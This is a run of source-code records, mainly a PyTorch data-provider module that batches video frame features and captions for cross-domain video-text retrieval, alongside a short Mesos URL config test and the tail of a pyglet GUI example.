open them.", width=300), FoldingSection("Folding 1", Document("This is the first folding.", width=300)), FoldingSection("Folding 2", Document("This is the second folding.", width=300), is_open=False), FoldingSection("Folding 3", Document("This is the third folding.", width=300), is_open=False), ], align=HALIGN_LEFT), height=400) ) Manager( content , window=window, batch=batch, anchor=ANCHOR_CENTER, theme=theme) pyglet.app.run()
none
1
2.348646
2
tests/conf_test.py
b2wdigital/asgard-events-indexer
0
6618596
from indexer.conf import settings from tests.base import BaseTestCase class ConfTest(BaseTestCase): async def test_load_mesos_urls(self): self.assertEqual( settings.MESOS_MASTER_URLS, ["http://127.0.0.1:5050", "http://10.0.0.1:5050"], )
from indexer.conf import settings from tests.base import BaseTestCase class ConfTest(BaseTestCase): async def test_load_mesos_urls(self): self.assertEqual( settings.MESOS_MASTER_URLS, ["http://127.0.0.1:5050", "http://10.0.0.1:5050"], )
none
1
1.898819
2
util/data_provider.py
Recmoon/MAN
2
6618597
<filename>util/data_provider.py import torch import torch.utils.data as data import numpy as np import json as jsonmod from basic.util import getVideoId from vocab import clean_str import sys VIDEO_MAX_LEN=64 def collate_frame_gru_fn(data): """ Build mini-batch tensors from a list of (video, caption) tuples. """ # Sort a data list by caption length if len(data[0]) == 10: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None lengths_target = None words_mask_target = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target elif len(data[0]) == 14: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target, videos_source2, video_ids_source2, cap_tensor_source2, cap_bow_source2= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 video_lengths_source2 = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_source2] frame_vec_len = len(videos_source2[0][0]) vidoes_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2), frame_vec_len) videos_origin_source2 = torch.zeros(len(videos_source2), frame_vec_len) vidoes_mask_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2)) for i, frames in enumerate(videos_source2): end = video_lengths_source2[i] vidoes_source2[i, :end, :] = frames[:end,:] videos_origin_source2[i,:] = torch.mean(frames,0) vidoes_mask_source2[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None lengths_target = None words_mask_target = None if cap_tensor_source2[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_source2 = [len(cap) for cap in cap_tensor_source2] target_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)).long() words_mask_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)) for i, cap in enumerate(cap_tensor_source2): end = lengths_source2[i] target_source2[i, :end] = cap[:end] words_mask_source2[i, :end] = 1.0 else: target_source2 = None lengths_source2 = None words_mask_source2 = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None cap_bow_source2 = torch.stack(cap_bow_source2, 0) if cap_bow_source2[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) text_data_source2 = (target_source2, cap_bow_source2, lengths_source2, words_mask_source2) video_data_source2 = (vidoes_source2, videos_origin_source2, video_lengths_source2, vidoes_mask_source2) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target, video_ids_source2, video_data_source2, text_data_source2 else: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) return video_data, text_data, idxs, cap_ids, video_ids def collate_frame(data): videos, idxs, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) return video_data, idxs, video_ids def collate_text(data): if data[0][0] is not None: data.sort(key=lambda x: len(x[0]), reverse=True) captions, cap_bows, idxs, cap_ids = zip(*data) if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None text_data = (target, cap_bows, lengths, words_mask) return text_data, idxs, cap_ids class Dataset4DualEncoding(data.Dataset): """ Load captions and video frame features by pre-trained CNN model. """ def __init__(self, cap_file, visual_feat, bow2vec, vocab, n_caption=None, video2frames=None, visual_feat_target=None, video2frames_target=None, caption_file_target=None, visual_feat_source2=None, video2frames_source2=None, caption_file_source2=None): # Captions self.captions = {} self.captions_target = {} self.captions_source2 = {} self.cap_ids = [] self.cap_ids_target = [] self.cap_ids_source2 = [] self.visual_feat = visual_feat self.video2frames = video2frames self.visual_feat_target = visual_feat_target self.video2frames_target = video2frames_target self.visual_feat_source2 = visual_feat_source2 self.video2frames_source2 = video2frames_source2 with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) if visual_feat_target!=None and video2frames_target!=None: with open(caption_file_target, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_target[cap_id] = caption self.cap_ids_target.append(cap_id) if visual_feat_source2!=None and video2frames_source2!=None: with open(caption_file_source2, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_source2[cap_id] = caption self.cap_ids_source2.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) # self.cap_ids_target = self.cap_ids_target * 2 print(self.length) print(len(self.cap_ids_target)) # if n_caption is not None: # assert len(self.video_ids) * n_caption == self.length, "%d != %d" % (len(self.video_ids) * n_caption, self.length) def __getitem__(self, index): cap_id = self.cap_ids[index] video_id = getVideoId(cap_id) frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None if self.visual_feat_target != None and self.video2frames_target != None: cap_id_target = self.cap_ids_target[index] video_id_target = getVideoId(cap_id_target) frame_list = self.video2frames_target[video_id_target] frame_vecs_target = [] for frame_id in frame_list: frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) frames_tensor_target = torch.Tensor(frame_vecs_target) caption_target = self.captions_target[cap_id_target] # caption_target = self.cap_ids_target[index] # video_id_target = 'a' # frame_list = self.video2frames_target[self.target_video_id_list[index]] # frame_vecs_target = [] # for frame_id in frame_list: # frame_vecs_target.append(self.visual_feat_target.read_one(frame_id)) # frames_tensor_target = torch.Tensor(frame_vecs_target) if self.bow2vec is not None: cap_bow_target = self.bow2vec.mapping(caption_target) if cap_bow_target is None: cap_bow_target = torch.zeros(self.bow2vec.ndims) else: cap_bow_target = torch.Tensor(cap_bow_target) else: cap_bow_target = None if self.vocab is not None: tokens = clean_str(caption_target) caption_target = [] caption_target.append(self.vocab('<start>')) caption_target.extend([self.vocab(token) for token in tokens]) caption_target.append(self.vocab('<end>')) cap_tensor_target = torch.Tensor(caption_target) else: cap_tensor_target = None if self.visual_feat_source2 != None and self.video2frames_source2 != None: cap_id_source2 = self.cap_ids_source2[index] video_id_source2 = getVideoId(cap_id_source2) frame_list = self.video2frames_source2[video_id_source2] frame_vecs_source2 = [] for frame_id in frame_list: frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) frames_tensor_source2 = torch.Tensor(frame_vecs_source2) caption_source2 = self.captions_source2[cap_id_source2] # caption_source2 = self.cap_ids_source2[index] # video_id_source2 = 'a' # frame_list = self.video2frames_source2[self.source2_video_id_list[index]] # frame_vecs_source2 = [] # for frame_id in frame_list: # frame_vecs_source2.append(self.visual_feat_source2.read_one(frame_id)) # frames_tensor_source2 = torch.Tensor(frame_vecs_source2) if self.bow2vec is not None: cap_bow_source2 = self.bow2vec.mapping(caption_source2) if cap_bow_source2 is None: cap_bow_source2 = torch.zeros(self.bow2vec.ndims) else: cap_bow_source2 = torch.Tensor(cap_bow_source2) else: cap_bow_source2 = None if self.vocab is not None: tokens = clean_str(caption_source2) caption_source2 = [] caption_source2.append(self.vocab('<start>')) caption_source2.extend([self.vocab(token) for token in tokens]) caption_source2.append(self.vocab('<end>')) cap_tensor_source2 = torch.Tensor(caption_source2) else: cap_tensor_source2 = None return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target, frames_tensor_source2, video_id_source2, cap_tensor_source2, cap_bow_source2 else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id, frames_tensor_target, video_id_target, cap_tensor_target, cap_bow_target else: return frames_tensor, cap_tensor, cap_bow, index, cap_id, video_id def __len__(self): return self.length class VisDataSet4DualEncoding(data.Dataset): """ Load video frame features by pre-trained CNN model. """ def __init__(self, visual_feat, video2frames=None): self.visual_feat = visual_feat self.video2frames = video2frames self.video_ids = video2frames.keys() self.length = len(self.video_ids) def __getitem__(self, index): video_id = self.video_ids[index] frame_list = self.video2frames[video_id] frame_vecs = [] for frame_id in frame_list: frame_vecs.append(self.visual_feat.read_one(frame_id)) frames_tensor = torch.Tensor(frame_vecs) return frames_tensor, index, video_id def __len__(self): return self.length class TxtDataSet4DualEncoding(data.Dataset): """ Load captions """ def __init__(self, cap_file, bow2vec, vocab): # Captions self.captions = {} self.cap_ids = [] with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) self.bow2vec = bow2vec self.vocab = vocab self.length = len(self.cap_ids) def __getitem__(self, index): cap_id = self.cap_ids[index] caption = self.captions[cap_id] if self.bow2vec is not None: cap_bow = self.bow2vec.mapping(caption) if cap_bow is None: cap_bow = torch.zeros(self.bow2vec.ndims) else: cap_bow = torch.Tensor(cap_bow) else: cap_bow = None if self.vocab is not None: tokens = clean_str(caption) caption = [] caption.append(self.vocab('<start>')) caption.extend([self.vocab(token) for token in tokens]) caption.append(self.vocab('<end>')) cap_tensor = torch.Tensor(caption) else: cap_tensor = None return cap_tensor, cap_bow, index, cap_id def __len__(self): return self.length def get_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=2, n_caption=2, video2frames=None, video2frames_target=None, visual_feats_target=None, caption_file_target=None, multi_flag=0): """ Returns torch.utils.data.DataLoader for train and validation datasets Args: cap_files: caption files (dict) keys: [train, val] visual_feats: image feats (dict) keys: [train, val] """ if video2frames_target!=None and visual_feats_target!=None: if multi_flag == 0: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train'], video2frames_target=video2frames_target['train'], visual_feat_target=visual_feats_target['train'], caption_file_target=caption_file_target, visual_feat_source2=visual_feats['train2'], video2frames_source2=video2frames['train2'], caption_file_source2=cap_files['train2']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} else: dset = {'train': Dataset4DualEncoding(cap_files['train'], visual_feats['train'], bow2vec, vocab, video2frames=video2frames['train']), 'val': Dataset4DualEncoding(cap_files['val'], visual_feats['val'], bow2vec, vocab, n_caption, video2frames=video2frames['val']), 'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames=video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=(x=='train'), pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in ['train', 'val', 'test']} return data_loaders def get_test_data_loaders(cap_files, visual_feats, vocab, bow2vec, batch_size=100, num_workers=2, n_caption=2, video2frames = None): """ Returns torch.utils.data.DataLoader for test dataset Args: cap_files: caption files (dict) keys: [test] visual_feats: image feats (dict) keys: [test] """ dset = {'test': Dataset4DualEncoding(cap_files['test'], visual_feats['test'], bow2vec, vocab, n_caption, video2frames = video2frames['test'])} data_loaders = {x: torch.utils.data.DataLoader(dataset=dset[x], batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame_gru_fn) for x in cap_files } return data_loaders def get_vis_data_loader(vis_feat, batch_size=100, num_workers=2, video2frames=None): dset = VisDataSet4DualEncoding(vis_feat, video2frames) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_frame) return data_loader def get_txt_data_loader(cap_file, vocab, bow2vec, batch_size=100, num_workers=2): dset = TxtDataSet4DualEncoding(cap_file, bow2vec, vocab) data_loader = torch.utils.data.DataLoader(dataset=dset, batch_size=batch_size, shuffle=False, pin_memory=True, num_workers=num_workers, collate_fn=collate_text) return data_loader if __name__ == '__main__': pass
<filename>util/data_provider.py import torch import torch.utils.data as data import numpy as np import json as jsonmod from basic.util import getVideoId from vocab import clean_str import sys VIDEO_MAX_LEN=64 def collate_frame_gru_fn(data): """ Build mini-batch tensors from a list of (video, caption) tuples. """ # Sort a data list by caption length if len(data[0]) == 10: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None lengths_target = None words_mask_target = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target elif len(data[0]) == 14: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids, videos_target, video_ids_target, cap_tensor_target, cap_bow_target, videos_source2, video_ids_source2, cap_tensor_source2, cap_bow_source2= zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_lengths_target = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_target] frame_vec_len = len(videos_target[0][0]) vidoes_target = torch.zeros(len(videos_target), max(video_lengths_target), frame_vec_len) videos_origin_target = torch.zeros(len(videos_target), frame_vec_len) vidoes_mask_target = torch.zeros(len(videos_target), max(video_lengths_target)) for i, frames in enumerate(videos_target): end = video_lengths_target[i] vidoes_target[i, :end, :] = frames[:end,:] videos_origin_target[i,:] = torch.mean(frames,0) vidoes_mask_target[i,:end] = 1.0 video_lengths_source2 = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos_source2] frame_vec_len = len(videos_source2[0][0]) vidoes_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2), frame_vec_len) videos_origin_source2 = torch.zeros(len(videos_source2), frame_vec_len) vidoes_mask_source2 = torch.zeros(len(videos_source2), max(video_lengths_source2)) for i, frames in enumerate(videos_source2): end = video_lengths_source2[i] vidoes_source2[i, :end, :] = frames[:end,:] videos_origin_source2[i,:] = torch.mean(frames,0) vidoes_mask_source2[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None if cap_tensor_target[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_target = [len(cap) for cap in cap_tensor_target] target_target = torch.zeros(len(cap_tensor_target), max(lengths_target)).long() words_mask_target = torch.zeros(len(cap_tensor_target), max(lengths_target)) for i, cap in enumerate(cap_tensor_target): end = lengths_target[i] target_target[i, :end] = cap[:end] words_mask_target[i, :end] = 1.0 else: target_target = None lengths_target = None words_mask_target = None if cap_tensor_source2[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths_source2 = [len(cap) for cap in cap_tensor_source2] target_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)).long() words_mask_source2 = torch.zeros(len(cap_tensor_source2), max(lengths_source2)) for i, cap in enumerate(cap_tensor_source2): end = lengths_source2[i] target_source2[i, :end] = cap[:end] words_mask_source2[i, :end] = 1.0 else: target_source2 = None lengths_source2 = None words_mask_source2 = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None cap_bow_target = torch.stack(cap_bow_target, 0) if cap_bow_target[0] is not None else None cap_bow_source2 = torch.stack(cap_bow_source2, 0) if cap_bow_source2[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) text_data_target = (target_target, cap_bow_target, lengths_target, words_mask_target) video_data_target = (vidoes_target, videos_origin_target, video_lengths_target, vidoes_mask_target) text_data_source2 = (target_source2, cap_bow_source2, lengths_source2, words_mask_source2) video_data_source2 = (vidoes_source2, videos_origin_source2, video_lengths_source2, vidoes_mask_source2) return video_data, text_data, idxs, cap_ids, video_ids, video_ids_target, video_data_target, text_data_target, video_ids_source2, video_data_source2, text_data_source2 else: if data[0][1] is not None: data.sort(key=lambda x: len(x[1]), reverse=True) videos, captions, cap_bows, idxs, cap_ids, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) text_data = (target, cap_bows, lengths, words_mask) return video_data, text_data, idxs, cap_ids, video_ids def collate_frame(data): videos, idxs, video_ids = zip(*data) # Merge videos (convert tuple of 1D tensor to 4D tensor) video_lengths = [min(VIDEO_MAX_LEN,len(frame)) for frame in videos] frame_vec_len = len(videos[0][0]) vidoes = torch.zeros(len(videos), max(video_lengths), frame_vec_len) videos_origin = torch.zeros(len(videos), frame_vec_len) vidoes_mask = torch.zeros(len(videos), max(video_lengths)) for i, frames in enumerate(videos): end = video_lengths[i] vidoes[i, :end, :] = frames[:end,:] videos_origin[i,:] = torch.mean(frames,0) vidoes_mask[i,:end] = 1.0 video_data = (vidoes, videos_origin, video_lengths, vidoes_mask) return video_data, idxs, video_ids def collate_text(data): if data[0][0] is not None: data.sort(key=lambda x: len(x[0]), reverse=True) captions, cap_bows, idxs, cap_ids = zip(*data) if captions[0] is not None: # Merge captions (convert tuple of 1D tensor to 2D tensor) lengths = [len(cap) for cap in captions] target = torch.zeros(len(captions), max(lengths)).long() words_mask = torch.zeros(len(captions), max(lengths)) for i, cap in enumerate(captions): end = lengths[i] target[i, :end] = cap[:end] words_mask[i, :end] = 1.0 else: target = None lengths = None words_mask = None cap_bows = torch.stack(cap_bows, 0) if cap_bows[0] is not None else None text_data = (target, cap_bows, lengths, words_mask) return text_data, idxs, cap_ids class Dataset4DualEncoding(data.Dataset): """ Load captions and video frame features by pre-trained CNN model. """ def __init__(self, cap_file, visual_feat, bow2vec, vocab, n_caption=None, video2frames=None, visual_feat_target=None, video2frames_target=None, caption_file_target=None, visual_feat_source2=None, video2frames_source2=None, caption_file_source2=None): # Captions self.captions = {} self.captions_target = {} self.captions_source2 = {} self.cap_ids = [] self.cap_ids_target = [] self.cap_ids_source2 = [] self.visual_feat = visual_feat self.video2frames = video2frames self.visual_feat_target = visual_feat_target self.video2frames_target = video2frames_target self.visual_feat_source2 = visual_feat_source2 self.video2frames_source2 = video2frames_source2 with open(cap_file, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions[cap_id] = caption self.cap_ids.append(cap_id) if visual_feat_target!=None and video2frames_target!=None: with open(caption_file_target, 'r') as cap_reader: for line in cap_reader.readlines(): cap_id, caption = line.strip().split(' ', 1) self.captions_target[cap_id] = caption self.cap_ids_target.append(cap_id) if visual_feat_source2!=None and video2frames_source2!=None: 